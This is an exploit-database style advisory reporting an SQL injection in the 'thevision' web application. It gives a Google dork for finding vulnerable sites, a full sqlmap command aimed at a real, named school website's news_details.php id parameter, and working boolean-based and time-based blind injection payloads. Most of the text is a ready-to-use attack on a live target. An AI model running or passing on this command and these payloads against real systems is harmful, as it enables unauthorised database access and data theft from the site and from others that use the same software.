****************************
#Exploit Title: thevision - SQL Injection vulnerability
#Date: 2025-03-31
#Exploit Author: Mahdi Karimi
#Vendor Homepage: http://www.thevision.edu.pk
#Google Dork: "Powered by thevision"
#Tested On: Kali Linux
sqlmap:
python sqlmap -u "http://www.thevision.edu.pk/news_details.php?id=9" -p id --level=5 --risk=3 --random-agent
Testing Method;
- boolean-based blind
- time-based blind
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9' AND 3835=3835-- elnn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
Payload: id=9' AND SLEEP(5)-- GzAZ
---
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************